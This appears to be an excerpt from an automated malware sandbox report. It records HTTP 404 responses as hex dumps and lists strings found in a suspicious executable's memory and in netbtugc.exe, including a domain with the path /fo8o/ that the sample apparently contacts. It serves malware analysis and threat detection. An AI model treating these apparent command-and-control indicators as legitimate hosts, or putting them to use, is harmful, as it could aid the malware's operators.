            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 15 Jan 2025 07:28:32 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 15 Jan 2025 07:28:55 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 15 Jan 2025 07:28:58 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 15 Jan 2025 07:29:00 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Wed, 15 Jan 2025 07:29:03 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:30:58 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:01 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:03 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:06 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:11 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:14 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:16 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 15 Jan 2025 07:31:19 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
            Source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4623753235.0000000004C3D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com
            Source: wRnnQBtyTqqaEOnAYYgvzRWAV.exe, 00000008.00000002.4623753235.0000000004C3D000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.empowermedeco.com/fo8o/
            Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: netbtugc.exe, 00000004.00000002.4625606188.000000000774A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
